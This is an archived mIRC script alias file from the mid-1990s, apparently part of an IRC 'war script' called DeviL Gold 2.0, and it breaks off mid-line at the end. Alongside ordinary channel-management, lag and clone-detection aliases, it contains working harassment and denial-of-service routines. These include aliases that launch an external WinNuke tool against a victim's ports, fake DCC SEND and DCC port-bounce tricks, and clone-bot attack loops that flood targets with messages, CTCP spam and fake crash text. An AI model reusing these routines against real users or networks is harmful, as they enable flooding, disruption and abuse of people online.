home *** CD-ROM | disk | FTP | other *** search
Wrap
INI File | 1997-02-14 | 32.5 KB | 792 lines
[Aliases] n0=/nuke /run c:\revpower\bin\wnuke4.exe -n $$1 $$2 0 1024-2048 $$3 n1=/syn /run c:\revpower\bin\wnuke4.exe -i $$1 6667-6669 n2=/wnuke /enable #nuke | /whois $$1 n3=;--------------------key aliases n4=/f1 { %f1 } n5=/sf1 /set -q %f1 $$?="Enter Commands for F1:" n6=/f2 { %f2 } n7=/sf2 /set -q %f2 $$?="Enter Commands for F2:" n8=/f3 { %f3 } n9=/sf3 /set -q %f3 $$?="Enter Commands for F3:" n10=/f4 { %f4 } n11=/sf4 /set -q %f4 $$?="Enter Commands for F4:" n12=/f5 { %f5 } n13=/sf5 /set -q %f5 $$?="Enter Commands for F5:" n14=/sf12 /ignore -rp *!*@* | /echo 4 -s Removed CTCP Ignoring n15=/f12 /ignore -p *!*@* | /echo 4 -s Ignoring all CTCPs n16=;-------------------------------------------war aliases n17=/gchat /raw privmsg $$1 :DCC CHAT chat 33371822594 19 $+ n18=/fakedccsend /raw privmsg $$1 :DCC SEND $$2 3371822594 19 $$3 n19=/dccmail { n20= /set -q %mailip $$?="Enter SMTP Server IP" n21= /set -q %from $$?="From (Your Address):" n22= /set -q %to $$?="To (Receiver Address):" n23= /set -q %msg $$?="Message:" n24= /raw privmsg $me :DCC CHAT CHAT $longip(%mailip) 25 $+ n25= /set -q %dcc Mail n26=} n27=/dcctelnet { n28= /raw privmsg $me :DCC CHAT CHAT $longip($$?="Enter Telnet Server IP)) 23 $+ n29=} n30=/dccftp { n31= /raw privmsg $me :DCC CHAT CHAT $longip($$?="Enter FTP Server IP)) 21 $+ n32=} n33=/dccident { n34= /raw privmsg $me :DCC CHAT CHAT $longip($$?="Enter Ident Server IP)) 113 $+ n35=} n36=/dccecho { n37= /raw privmsg $me :DCC CHAT CHAT $longip($$?="Enter Echo Server IP)) 7 $+ n38=} n39=/chatclone { n40= /set -q %cName $$?="Name: (ID)" n41= /set -q %cHostName $$?="Host:" n42= /set -q %cServerName $$?="IRC Server:" n43= /set -q %cRealName $$?="Real Name:" n44= /set -q %cNick $$?="Nick:" n45= /raw privmsg $me :DCC CHAT CHAT $longip(%serverip) $port $+ n46= /set -q %dcc Clone n47=} n48=/attack { n49= /auser 900 $$1 n50= /set -q %underattack $$1 n51= /timer 9 5 /auser 900 $$1 n52= /timer 1 50 /unset %underattack | /ruser $$1 n53= /timer 1 15 /raw -q ison $$1 n54= /s2clones /attack $$1 $$2 $$3 n55=} n56=/longip /echo 4 IP: 2 $$1 4 -> LongIP: 2 $longip($$1) n57=;----------------------------------------------split detector n58=/splitdet { n59= if (($$1 isin %badword) || ($$2 isin %badword)) /halt n60= %split == $$1 $$2 n61= if %lastsplit == $$2 /halt n62= if $len(%split) > 50 /halt n63= %splitchr = 125 n64= :start n65= %splitchr = %splitchr + 1 n66= if $chr(%splitchr) isin %split /halt n67= if %splitchr < 255 goto start n68= %splitchr = 0 n69= :start2 n70= %splitchr = %splitchr + 1 n71= if $chr(%splitchr) isin %split /halt n72= if %splitchr < 31 goto start2 n73= amsg â╨úv═L«â:NETSPLIT DETECTED:É $+ $$2 $+ É n74= set -q %lastsplit $$2 n75= .timer 1 30 /unset %lastsplit n76= unset %split n77=} n78=;----------------------------------------------command to send data 2 clones n79=/s2clones { n80= /unset %cclone n81= /set -q %data2send *1 n82= :start n83= /inc %cclone n84= /dde clone $+ %cclone command "" %data2send n85= /if %cclone < 8 /goto start n86= /unset %cclone n87=} n88=;----------------------------------------------status commands n89=/uptitle { n90= if $len(%hours) == 1 { %hours = 0 $+ %hours } n91= if $len(%minutes) == 1 { %minutes = 0 $+ %minutes } n92= if (%lag == 0) { titlebar %titlebar - No Lag(0) - %hours $+ : $+ %minutes OnLine } n93= if (%lag <= 3) { titlebar %titlebar - No Lag(0) - %hours $+ : $+ %minutes OnLine } n94= else { titlebar %titlebar - Lag( $+ %lag secs) - %hours $+ : $+ %minutes OnLine } n95=} n96=/ustatus { n97= if $len(%hours) == 1 { %hours = 0 $+ %hours } n98= if $len(%minutes) == 1 { %minutes = 0 $+ %minutes } n99= /echo 14 ----------------------------------------------- n100= /echo 4 %devill 2User Status2 n101= /echo 14 ----------------------------------------------- n102= /echo 3 Nick: 4 $+ $me n103= /echo 3 IRCop: 4 $+ %ircop n104= /echo 3 Host: 4 $+ $host n105= /echo 3 IP:4 $ip n106= /echo 3 Current page on your Browser:4 $+ $url n107= /echo 3 Lag:4 %lag n108= /echo 3 Current Server / Port: 4 $+ $server $+ 1/4 $port n109= /echo 3 Login Time: 4 $+ $mid(11,6,$asctime(%logintime)) n110= /echo 3 Time OnLine:4 %hours $+ : $+ %minutes 4 n111= /echo 3 AutoKick Flood:4 %floodkick n112= /echo 3 AutoKick Caps:4 %capskicker n113= /echo 3 AutoKick Repetition:4 %reptkicker n114= /echo 3 AutoKick BadWord:4 %bwkicker n115= /echo 14 ----------------------------------------------- n116=} n117=/sstatus { n118= /lusers n119= /raw -q time $server n120= /echo 14 ----------------------------------------------- n121= /echo 4 %devill 14Server Status14 n122= /echo 14 ----------------------------------------------- n123= /echo 3 Server:1 $server n124= /echo 3 Server IP:1 %serverip n125= /echo 3 Number Of Users:12 %numofusers n126= /echo 3 Number Of Invisible Users:12 %numofinvusers n127= /echo 3 Number Of Channels:12 %numofchans n128= /echo 3 Number Of Operators on Line:7 %opersonline n129= /echo 3 Time on Server:1 %servertime n130= /echo 14 ----------------------------------------------- n131=} n132=;------------------------------------------floodometer n133=/wrtfld { n134= /dde devilcp ⌐╪±T«╪LPA±úL floodlevel %fldmtr n135= /set -q %fldmtr 0 n136=} n137=/upfldvar /inc %fldmtr n138=/rstfldvar /set -q %fldmtr 0 n139=/fldmtr { n140= /if %fldmtrst == on { n141= /set %fldmtrst == off n142= /timer7 off n143= /disable #floodometer n144= /goto end n145= } n146= /if $$1 == on { n147= /set %fldmtrst == on n148= /timer7 0 1 /wrtfld n149= /enable #floodometer n150= /goto end n151= } n152= /if %fldmtrst == off { n153= /set %fldmtrst == on n154= /timer7 0 1 /wrtfld n155= /enable #floodometer n156= /goto end n157= } n158= /if $$1 == off { n159= /set %fldmtrst == off n160= /timer7 off n161= /disable #floodometer n162= /goto end n163= } n164= :end n165=} n166=;--------------------------------------------lagtester n167=/lagtest { n168= /enable #lagtest n169= /flush 1 n170= //auser 1 $me n171= /echo 4 $active %devill 2½½ 14Testing Lag 2╗╗ n172= if $len(%hours) == 1 { %hours = 0 $+ %hours } n173= if $len(%minutes) == 1 { %minutes = 0 $+ %minutes } n174= /titlebar %titlebar - ½½ Testing Lag ╗╗ - %hours $+ : $+ %minutes OnLine n175= /ctcp $me ping n176=} n177=;----------------------------idlekicker n178=/idlekick { n179= /enable #idle.kicker n180= /set -q %idlekickchan #$$1 n181= /set -q %totuser (0, %idlekickchan) n182= /unset %curuser n183= /msg %idlekickchan Starting %devill Idle-Kicker on %idlekickchan... n184= :start n185= /inc %curuser n186= /whois $nick(%curuser, %idlekickchan) n187= /if %curuser < %totuser /goto start n188= /unset %curuser n189=} n190=/reset { n191= titlebar ╨úv═L'º Shut Down Sequence Initiated n192= echo 4 -a --------------- Restarting ╨úv═L --------------- n193= echo 2 - n194= if $server != $null /away Restarting ╨úv═L n195= echo 4 -s Deactivating Groups n196= /disable #text n197= /disable #action n198= /disable #notice n199= echo 4 -s Switching off Timers n200= /timers off n201= echo 4 -s Flushing Levels n202= /flush n203= /rlevel 51 n204= /rlevel 52 n205= /rlevel 53 n206= /rlevel 0 n207= if %proxys == $null { %proxys = bbs.elogica.com.br } n208= if %ircop == $null { %ircop = NO } n209= if %badword == $null { %badword = . } n210= if %hours == $null { %hours = 00 } n211= if %minutes == $null { %minutes = 00 } n212= if %flines == $null { %flines = 5 } n213= if %fkicks == $null { %fkicks = 5 } n214= if %floodkick == $null { %floodkick = off } n215= if %capskicker == $null { %capskicker = off } n216= if %bwkicker == $null { %bwkicker = off } n217= if %reptkicker == $null { %reptkicker = off } n218= if %topic == $null { %topic = --=@{^DeviL^}@=-- } n219= if %lag == $null { %lag = 0 } n220= if %banact == $null { %banact = 0 } n221= if %f1 == $null { %f1 = /j #irclub } n222= if %f2 == $null { %f2 = /using } n223= if %f3 == $null { %f3 = /toget } n224= if %f4 == $null { %f4 = /ignore *!*@* } n225= if %f5 == $null { %f5 = /ignore -r *!*@* } n226= if %nclones == $null { %nclones = 2 } n227= if %dclones == $null { %dclones = 2 } n228= if %anti-automsg == $null { %anti-automsg = off } n229= if %noclones == $null { %noclones = off } n230= if %badnick == $null { %banick = off } n231= if %badnicks == $null { %badnicks = . } n232= if %bytekick == $null { %bytekick = off } n233= if %bytelimit == $null { %bytelimit = 200 } n234= if %autosend == $null { %autosend = off } n235= if %autosendfile == $null { %autosendfile = . } n236= if %autosendtext == $null { %autosendtext = . } n237= /writeini $mircdir $+ reset.ini reset bytelimit %bytelimit n238= /writeini $mircdir $+ reset.ini reset bytekick %bytekick n239= /writeini $mircdir $+ reset.ini reset noclones %noclones n240= /writeini $mircdir $+ reset.ini reset badnicks %badnicks n241= /writeini $mircdir $+ reset.ini reset badnick %badnick n242= /writeini $mircdir $+ reset.ini reset antimsg %anti-automsg n243= /writeini $mircdir $+ reset.ini reset proxys %proxys n244= /writeini $mircdir $+ reset.ini reset ircop %ircop n245= /writeini $mircdir $+ reset.ini reset badword %badword n246= /writeini $mircdir $+ reset.ini reset hours %hours n247= /writeini $mircdir $+ reset.ini reset minutes %minutes n248= /writeini $mircdir $+ reset.ini reset flines %flines n249= /writeini $mircdir $+ reset.ini reset fkicks %fkicks n250= /writeini $mircdir $+ reset.ini reset floodkick %floodkick n251= /writeini $mircdir $+ reset.ini reset capskicker %capskicker n252= /writeini $mircdir $+ reset.ini reset bwkicker %bwkicker n253= /writeini $mircdir $+ reset.ini reset reptkicker %reptkicker n254= /writeini $mircdir $+ reset.ini reset topic %topic n255= /writeini $mircdir $+ reset.ini reset lag %lag n256= /writeini $mircdir $+ reset.ini reset noban %banact n257= /writeini $mircdir $+ reset.ini reset macrof1 %f1 n258= /writeini $mircdir $+ reset.ini reset macrof2 %f2 n259= /writeini $mircdir $+ reset.ini reset macrof3 %f3 n260= /writeini $mircdir $+ reset.ini reset macrof4 %f4 n261= /writeini $mircdir $+ reset.ini reset macrof5 %f5 n262= /writeini $mircdir $+ reset.ini reset dclones %dclones n263= /writeini $mircdir $+ reset.ini reset nclones %nclones n264= /writeini $mircdir $+ reset.ini reset autosendfile %autosendfile n265= /writeini $mircdir $+ reset.ini reset autosendtext %autosendtext n266= /writeini $mircdir $+ reset.ini reset autosend %autosend n267= echo 4 -s Flushing Variables n268= /unsetall n269= echo 2 - n270= echo 2 -s Restarting Timers n271= if ($server != $null) { /timer1 0 300 /lagtest } n272= if ($server != $null) { /timer2 0 300 { /lusers | /raw -q time $server } } n273= if ($server != $null) { /timer3 0 1800 /ustatus } n274= if ($server != $null) { /timer4 0 60 /uptitle } n275= if ((%fldmtrst == on) && ($server != $null)) { /timer7 0 1 /wrtfld } n276= if ($server != $null) { /timer8 0 60 /inc %minutes } n277= if ($server != $null) { /timer9 0 3600 /inc_hour } n278= /echo 2 - n279= echo 2 -s Adding Default Levels n280= /auser 1 $me n281= echo 2 -s Reactivating Groups n282= /enable #notice n283= /enable #action n284= /enable #text n285= echo 2 -s Resetting Variables n286= %mynick = $me n287= %myaddress = $address($me, 1) n288= set %autosendfile $readini $mircdir $+ reset.ini reset autosendfile n289= set %autosendtext $readini $mircdir $+ reset.ini reset autosendtext n290= set %autosend $readini $mircdir $+ reset.ini reset autosend n291= set %bytekick $readini $mircdir $+ reset.ini reset bytekick n292= set %bytelimit $readini $mircdir $+ reset.ini reset bytelimit n293= set %proxys $readini $mircdir $+ reset.ini reset proxys n294= set %ircop $readini $mircdir $+ reset.ini reset ircop n295= set %badword $readini $mircdir $+ reset.ini reset badword n296= set %hours $readini $mircdir $+ reset.ini reset hours n297= set %minutes $readini $mircdir $+ reset.ini reset minutes n298= set %flines $readini $mircdir $+ reset.ini reset flines n299= set %fkicks $readini $mircdir $+ reset.ini reset fkicks n300= set %floodkick $readini $mircdir $+ reset.ini reset floodkick n301= set %capskicker $readini $mircdir $+ reset.ini reset capskicker n302= set %bwkicker $readini $mircdir $+ reset.ini reset bwkicker n303= set %reptkicker $readini $mircdir $+ reset.ini reset reptkicker n304= set %topic $readini $mircdir $+ reset.ini reset topic n305= set %lag $readini $mircdir $+ reset.ini reset lag n306= set %banact $readini $mircdir $+ reset.ini reset noban n307= set %f1 $readini $mircdir $+ reset.ini reset macrof1 n308= set %f2 $readini $mircdir $+ reset.ini reset macrof2 n309= set %f3 $readini $mircdir $+ reset.ini reset macrof3 n310= set %f4 $readini $mircdir $+ reset.ini reset macrof4 n311= set %f5 $readini $mircdir $+ reset.ini reset macrof5 n312= set %dclones $readini $mircdir $+ reset.ini reset dclones n313= set %nclones $readini $mircdir $+ reset.ini reset nclones n314= set %anti-automsg $readini $mircdir $+ reset.ini reset antimsg n315= set %noclones $readini $mircdir $+ reset.ini reset noclones n316= set %badnicks $readini $mircdir $+ reset.ini reset badnicks n317= set %badnick $readini $mircdir $+ reset.ini reset badnick n318= %devill = â=^╨úv═L^=â n319= %titlebar = â=^╨úv═L^=â Gold Vúrºi0n 2.0 n320= %version = â=^╨úv═L^=â Gold Vúrºi0n 2.0, 1996⌐, Internet IRClub Corp. n321= echo 4 -a ╨úv═L'º Shut Down Sequence Completed n322= /uptitle n323= if $server != $null /lagtest n324= if $server != $null /away n325= if %killmsg = $null /set %killmsg Clone cleaning services... n326= if %kickmsg = $null /set %kickmsg Cleaning services... n327=} n328=/info /msg # â=╨úv═L'º=â Retrieving # channel info... | /msg # Operator status: [â $+ $opnick(0,#) $+ â] | /msg # Users status: [â $+ $nopnick(0,#) $+ â] | /msg # Done. total users on # : [â $+ $nick(0,#) $+ â] n329=/5 /join #Hackers n330=/4 /join #Turma n331=/op /mode # +ooo $$1 $2 $3 n332=/dop /mode # -ooo $$1 $2 $3 n333=/j { n334= /join #$$1 n335= /if ((%anti-automsg != $null) && (%anti-automsg != off)) { n336= if ((%lag != 0) && (%lag != $null)) /set %temp %lag + 4 | /ignore -pntu%temp *!*@* | /unset %temp n337= else /ignore -pntu5 *!*@* n338= /raw join #$$1 $2 n339= } n340= /if %anti-automsg == off { /raw join #$$1 $2 } n341=} n342=} n343=/p /part # n344=/n /names $$1 n345=/w /whois $$1 n346=/k /kick # $$1 *2 n347=/q /query $$1 n348=/hop /part # | /join #$$1 n349=/send /dcc send $1 $2 n350=/chat /dcc chat $$1 n351=/ping /ctcp $$1 ping n352=/ono /onotice # $+ [-=Wall-OP's/ $+ # $+ =-] $+ 1 *1 n353=/version /ctcp $$1 version n354=/hop /part # | /join #$$1 n355=/send /dcc send $1 $2 n356=/chat /dcc chat $1 n357=/ping /ctcp $$1 ping n358=/DIE /quit Mom, no! mooommm noooo....... | /exit n359=/SPYON /enable #spy n360=/SPYOFF /disable #spy n361=/1 /join #Brasil n362=/2 /join #Recife n363=/f6 { /echo 12 -s --------------------------------------------------- | /echo -s 12 Last CTCP: %lastctcp | /echo 12 -s --------------------------------------------------- } n364=/3 /join #Jovem n365=/using /ame is using 4 â=^╨úv═L^=â 8Gold 5Vúrºi0n 4â2.0â,3 1996⌐, Internet IRClub Corp. n366=/onick /auser 999 $me | /nick _ $+ $rand(1,9) $+ DeviL $+ $rand(1,9) $+ _ | /timer99 1 5 { /nick %mynick | /auser 1 $me | /flush 999 } n367=/unick /auser 999 $me | /nick _ $+ $rand(1,9) $+ $rand(1,9) $+ DeV $+ $rand(1,9) $+ $rand(1,9) $+ _ | /timer99 1 5 { /nick %mynick | /auser 1 $me | /flush 999 } n368=/enick /auser 999 $me | /nick $rand(a,z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(A,Z) $+ $rand(1,99) | /timer99 1 5 { /nick %mynick | /auser 1 $me | /flush 999 } n369=/idle /set -q %chan & $+ $r(A,Z) $+ $r(1,9) $+ Kill $+ $r(a,z) $+ $r(1,9) | /join %chan | /mode %chan +stin | /timer339 0 30 /describe %chan 4--=@{^╨úv═L'º^}@=-- 2Anti-Idle | /set -q %idle Yes n370=/unidle /timer339 off | /part %chan | /set -q %idle No n371=/akill /mode $me +s | /enable #ANTIKILL | /set -q %kill On | /echo 4 ╨úv═L'º Anti-Kill Actived n372=/akilloff /mode $me -s | /disable #ANTIKILL | /set -q %kill Off | /echo 4 ╨úv═L'º Anti-Kill DeActived n373=/inick /auser 999 $me | /nick $rand(a,z) $+ $rand(1,9) $+ $rand(A,Z) $+ Kill $+ $rand(1,9) $+ $rand(a,z) $+ $rand(A,Z) $+ $rand(1,9) | /timer99 1 5 { /nick %mynick | /auser 1 $me | /flush 999 } n374=/bnick /auser 999 $me | /nick $rand(a,z) $+ $rand(A,Z) $+ KilL $+ $rand(a,z) $+ $rand(A,Z) | /timer99 1 5 { /nick %mynick | /auser 1 $me | /flush 999 } n375=/cnick /auser 999 $me | /nick $read $mircdir $+ \nicks.txt | /timer99 1 5 { /nick %mynick | /auser 1 $me | /flush 999 } n376=/ircop /stats o n377=/kline /stats k n378=/tefode /play $mircdir $+ \Draws\2finger.txt n379=/total /me Informa que nesse momento, $time $+ , existem $nick(0,#) pessoas no canal # $+ . n380=;----- n381=/dce /set -q %x.x 0 | /enable #check.for.clones | /set -q %detecttype 0 | /set -q %detectact 0 | /who #$$1 n382=/kbc /set -q %x.x 0 | /enable #check.for.clones | /set -q %detecttype 1 | /set -q %detectact 2 | /who #$$1 | /set -q %detectchan $! n383=/dc /set -q %x.x 0 | /enable #check.for.clones | /set -q %detecttype 1 | /set -q %detectact 0 | /who #$$1 n384=/kc /set -q %x.x 0 | /enable #check.for.clones | /set -q %detecttype 1 | /set -q %detectact 1 | /who #$$1 | /set -q %detectchan $! n385=/killc /set -q %x.x 0 | /enable #check.for.clones | /set -q %detecttype 1 | /set -q %detectact 1 | /who #$$1 n386=;--------- n387=/irclube /me informa o endereco do 2Internet IRClub Corp. 1â[www.elogica.com.br/users/colares/irc.htm]â n388=/toget /me to get 8â=╨úv═L=â 2.0 Gold 1go to 2IRClub's 1site â[www.elogica.com.br/users/colares/irc.htm]â n389=/sogood { n390=:inicio n391=/echo 4 *1 n392=goto inicio n393=} n394=;-------------------------------------------mirror protection n395=/mirror { n396=/set -q %mirror1 $$1 n397=/set -q %mirrorsize $len($$1) n398=/unset -q %actmirr n399=/unset %oper n400=/unset %mirror2 n401=%mirror2 = "" n402=:start n403=/inc %actmirr n404=/set -q %oper %mirrorsize n405=/inc %oper n406=/dec %oper %actmirr n407=/set %mirror2 %mirror2 $+ $right(1,$left(%oper, %mirror1)) n408=/if %actmirr < %mirrorsize /goto start n409=/nick %mirror2 n410=/unset %mirror1 n411=/unset %mirror2 n412=/unset %oper n413=/unset %actmirr n414=/unset %mirrorsize n415=} n416=/nickchprotect /auser 999 $me | /nick _ $+ $rand(1,9) $+ DeviL $+ $rand(1,9) $+ _ | /timer90 1 5 /nick %mynick | /auser 1 $me | /flush 999 n417=;------------------------- mass commands n418=/nom { n419=set %opmsg.var 1 n420=:next n421=if ($nopnick(%opmsg.var,$$1) == $null) { goto done } n422=if ($nopnick(%opmsg.var,$$1) == $me) { inc %opmsg.var 1 | goto next } n423=.timer 1 5 .msg $nopnick(%opmsg.var,$$1) [Non-Ops Message] *2 n424=inc %opmsg.var 1 n425=goto next n426=:done n427=} n428=/non { n429=set %notice.var 1 n430=:next n431=if ($nopnick(%notice.var,$$1) == $null) { goto done } n432=if ($nopnick(%notice.var,$$1) == $me) { inc %notice.var 1 | goto next } n433=.notice $nopnick(%notice.var,$$1) [Non-Ops Notice] *2 n434=inc %notice.var 1 n435=goto next n436=:done n437=} n438=/omsg { n439=if ($me isop $$1) { omsg $$1 *2 } n440=else { n441= set %opmsg.var 1 n442= :next n443= if ($opnick(%opmsg.var,$$1) == $null) { goto done } n444= if ($opnick(%opmsg.var,$$1) == $me) { inc %opmsg.var 1 | goto next } n445= .msg $opnick(%opmsg.var,$$1) [Op-Wide Message] *2 n446= inc %opmsg.var 1 n447= goto next n448= :done n449=} n450=} n451=/MassMsg { n452=set %msg.var 1 n453=set %mass.msg $$?="Enter Your Msg:" n454=:next n455=if ($nick(%msg.var,$$1) == $null) { goto done } n456=if ($nick(%msg.var,$$1) == $me) { inc %msg.var 1 | goto next } n457=msg $nick(%msg.var,$$1) [╨úv═L] [Mass Msg] %mass.msg (Replies will be burnt!) n458=inc %msg.var 1 n459=goto next n460=:done n461=} n462=/Ops { n463=if ($me isop $$1) { onotice $$1 [Op-Wide Notice]: $+ $$1 $+ : *2 } n464=else { n465= set %notice.var 1 n466= :next n467= if ($opnick(%notice.var,$$1) == $null) { goto done } n468= .notice $opnick(%notice.var,$$1) [Op-Wide Notice]: $+ $$1 $+ : *2 n469= inc %notice.var 1 n470= goto next n471= :done n472=} n473=} n474=;----- n475=/inc_hour { /inc %hours | /set -q %minutes 00 } n476=;-------- byte kicker n477=iub { n478=inc % $+ [ $$1 ] $+ _bytes $$2 n479=} n480=dub { n481=dec % $+ [ $$1 ] $+ _bytes $$2 n482=%bytes = [ % $+ [ [ $$1 ] $+ _bytes ] ] n483=if (%bytes <= 0) { unset % $+ [ $$1 ] $+ _bytes } n484=unset %bytes n485=} n486=bytelevel { n487=return [ % $+ [ [ $$1 ] $+ _bytes ] ] n488=} n489=;-------- level aliases n490=/iuv { n491=if ($2 == $null) { n492= inc % $+ [ $$1 ] n493=goto end } n494=else { n495= %lev = [ % $+ [ $$2 ] ] n496= inc %lev n497= inc % $+ [ $$1 ] %lev n498= unset %lev n499=goto end } n500=:end n501=} n502=/duv { n503=dec % $+ [ $$1 ] n504=%uvar = [ % $+ [ $$1 ] ] n505=if (%uvar <= 0) { unset % $+ [ $$1 ] } n506=unset %uvar n507=} n508=/dul { n509=%lev = $level($$1) n510=dec %lev n511=auser %lev $$1 n512=if (%lev <= 0) { ruser $$1 } n513=unset %lev n514=} n515=/iul { n516=if ($2 == $null) { n517= %lev = $level($$1) n518= inc %lev n519= auser %lev $$1 n520= unset %lev n521=goto end } n522=else { n523= %lev = $level($$2) n524= inc %lev n525= auser %lev $$1 n526= unset %lev n527=goto end } n528=:end n529=} n530=;-----Clone Setup n531=/setcmsgs { n532=/write -l$$1 $mircdir $+ cmsgs.txt *2 n533=} n534=/setcnicks { n535=/write -l1 $mircdir $+ clnicks.txt $$1 n536=/write -l2 $mircdir $+ clnicks.txt $$2 n537=/write -l3 $mircdir $+ clnicks.txt $$3 n538=/write -l4 $mircdir $+ clnicks.txt $$4 n539=/write -l5 $mircdir $+ clnicks.txt $$5 n540=/write -l6 $mircdir $+ clnicks.txt $$6 n541=/write -l7 $mircdir $+ clnicks.txt $$7 n542=/write -l8 $mircdir $+ clnicks.txt $$8 n543=/write -l9 $mircdir $+ clnicks.txt $$9 n544=/write -l10 $mircdir $+ clnicks.txt $$10 n545=} n546=/setclserv { n547=/write -l1 $mircdir $+ clserver.txt $$1 n548=/write -l2 $mircdir $+ clserver.txt $$2 n549=/write -l3 $mircdir $+ clserver.txt $$3 n550=/write -l4 $mircdir $+ clserver.txt $$4 n551=} n552=;---identifiers n553=jplevel { n554=%lv = [ $$1 ] n555=%lv = %lv $+ _ $+ #$$2 $+ _join n556=%level = [ % $+ [ %lv ] ] n557=unset %lv n558=/return %level n559=} n560=nclevel { n561=%lv = [ $$1 ] n562=%lv = %lv $+ _ $+ #$$2 n563=%level = [ % $+ [ %lv ] ] n564=unset %lv n565=/return %level n566=} n567=tlevel { n568=%level = [ % $+ [ $$1_text ] ] n569=/return %level n570=} n571=alevel { n572=%level = [ % $+ [ $$1_action ] ] n573=/return %level n574=} n575=nklevel { n576=%level = [ % $+ [ $$1_nick ] ] n577=/return %level n578=} n579=nlevel { n580=%level = [ % $+ [ $$1_notice ] ] n581=/return %level n582=} n583=klevel { n584=%level = [ % $+ [ $$1_kicks ] ] n585=/return %level n586=} n587=devlev { n588=%level = $level($$1_devil) n589=/return %level n590=} n591=mutlev { n592=%level = $level($$1_mutant) n593=/return %level n594=} n595=killev { n596=%level = $level($$1_killer) n597=/return %level n598=} n599=/chattack { n600=/echo 3 Moving Clones to #$$1 n601=/echo 2 Please Wait... n602=/dde clone1 command "" /join #$$1 n603=/dde clone1 command "" /clsay n604=/timer 1 15 { /dde clone2 command "" /join #$$1 | /dde clone 2 command "" /clsay } n605=/timer 1 26 { /dde clone3 command "" /join #$$1 | /dde clone 3 command "" /clsay } n606=/timer 1 37 { /dde clone4 command "" /join #$$1 | /dde clone 4 command "" /clsay } n607=/timer 1 48 { /dde clone5 command "" /join #$$1 | /dde clone 5 command "" /clsay } n608=/timer 1 59 { /dde clone6 command "" /join #$$1 | /dde clone 6 command "" /clsay } n609=/timer 1 70 { /dde clone7 command "" /join #$$1 | /dde clone 7 command "" /clsay } n610=/timer 1 81 { /dde clone8 command "" /join #$$1 | /dde clone 8 command "" /clsay } n611=/timer 1 83 /s2clones /chattack #$$1 $$2 $$3 n612=/timer 1 83 /echo 4 -a Starting Attack on #$$1 n613=} n614=iscaps { n615=%t2v = *1 n616=%ret = false n617=if (%t2v == $null) { goto capsend } n618=%sizer = $len(%t2v) n619=%ch = 0 n620=%caps = 0 n621=%oth = 0 n622=:start n623=inc %ch n624=if (($asc($mid(%ch,1,%t2v)) > 64) && ($asc($mid(%ch,1,%t2v)) < 91)) { inc %caps } n625=elseif (($asc($mid(%ch,1,%t2v)) > 96) && ($asc($mid(%ch,1,%t2v)) < 123 )) { goto capsend } n626=else { inc %oth } n627=if (%ch == %sizer) { goto returner } n628=else { goto start } n629=:returner n630=%oth = %oth + %caps n631=if ((%oth == %sizer) && (%caps > 5)) { set %ret true } n632=else { set %ret false } n633=:capsend n634=unset %t2v %ch %caps %oth n635=return %ret n636=} n637=isbadwd { n638=%txt = *1 n639=if (%txt == $null) { goto bwend } n640=:getword n641=%sz = $len(%txt) n642=unset %word n643=%chr = 1 n644=:stgw n645=if ($asc($mid(%chr,1,%txt)) != 32) { n646= if (%word != $null) { %word = %word $+ $mid(%chr,1,%txt) } n647= else { %word = $mid(%chr,1,%txt) } n648= if (%chr == $len(%txt)) { goto verword } n649= inc %chr n650= goto stgw n651=} n652=else { goto verword } n653=:verword n654=inc %chr n655=%txt = $mid(%chr,%sz,%txt) n656=%word = $chr(187) $+ %word $+ $chr(187) n657=unset %sz n658=if $len(%word) > 1 { n659= if %word isin %badword { n660= return $remove(%word,$chr(187)) n661= unset %word n662= } n663= if %txt != $null { goto getword } n664=} n665=:bwend n666=unset %txt n667=} n668=isbadnk { n669=%txt = *1 n670=if (%txt == $null) { goto bwend } n671=:getword n672=%sz = $len(%txt) n673=unset %word n674=%chr = 1 n675=:stgw n676=if ($asc($mid(%chr,1,%txt)) != 32) { n677= if (%word != $null) { %word = %word $+ $mid(%chr,1,%txt) } n678= else { %word = $mid(%chr,1,%txt) } n679= if (%chr == $len(%txt)) { goto verword } n680= inc %chr n681= goto stgw n682=} n683=else { goto verword } n684=:verword n685=inc %chr n686=%txt = $mid(%chr,%sz,%txt) n687=%word = $chr(187) $+ %word $+ $chr(187) n688=unset %sz n689=if $len(%word) > 1 { n690= if %word isin %badnicks { n691= return $remove(%word,$chr(187)) n692= unset %word n693= } n694= if %txt != $null { goto getword } n695=} n696=:bwend n697=unset %txt n698=} n699=lasttext { n700=/set -q %lttrg $$1 $+ _ $+ $$2 $+ _last n701=/set -q %lt [ % $+ [ %lttrg ] ] n702=/unset %lttrg n703=/return %lt n704=} n705=/addlt { n706=/set -q %lttrg $$1 $+ _ $+ $$2 $+ _last n707=/set -q % $+ [ %lttrg ] *3 n708=/unset %lttrg n709=} n710=/rmlt { n711=/set -q %lttrg $$1 $+ _ $+ $$2 n712=/set -q % $+ [ %lttrg ] "" n713=/unset %lttrg n714=} n715=autolev { n716=/return [ % $+ [ $$1_auto ] ] n717=} n718=/swotimer { n719=%tim = 0 n720=%timcm = *1 n721=:start n722=inc %tim n723=if ($timer(%tim) == $null) { goto end } n724=elseif (([ %timcm ] isin $timer(%tim).com)) { n725= timer $+ %tim off n726=} n727=goto start n728=:end n729=} n730=;*** n731=/doat { n732=%attackvictim = $$1 n733=if ($2 == $null) { goto attack } n734=%attacktype = $2 n735=%attacktimes = $3 n736=:start n737=%attacks = 0 n738=:attack n739=if ($len(%attacktype) > 7) { goto 2 } n740=if (%attacktype == atmsg) { /msg %attackvictim $str(2,BurnInHellLamerTheDevilAwaitsYouThereIsNoEscapeFromHellFellMyPowersIamYourWorstNightmare) | /goto end } n741=if (%attacktype == atcmsg) { /msg %attackvictim $str(110, $+ $rand(0,15) $+ $+ $rand(0,15)) $+ DeviL | /goto end } n742=if (%attacktype == atcecho) { /ctcp %attackvictim $str(110, $+ $rand(0,15) $+ $+ $rand(0,15)) $+ DeviL | /goto end } n743=if (%attacktype == atbot) { /msg %attackvictim hello | /msg %attackvictim pass $rand(a,z) $+ $rand(0,9) $+ $rand(a,z) $+ $rand(0,9) $+ $rand(a,z) | /msg %attackvictim whois DieLazyBotSeeYaInHellTheDevilIsWaitingYou | /msg %attackvictim info DieLazyBotSeeYaInHellTheDevilIsWaitingYou | /goto end } n744=if (%attacktype == atgpf) { /ctcp %attackvictim echo $str(40, General Protection Fault E««╪« [GPF] ) | /goto end } n745=if (%attacktype == atping) { /ctcp %attackvictim ping | /goto end } n746=if (%attacktype == attrout) { /ctcp %attackvictim trout | /goto end } n747=if (%attacktype == atpong) { /ctcp %attackvictim pong | /goto end } n748=if (%attacktype == attime) { 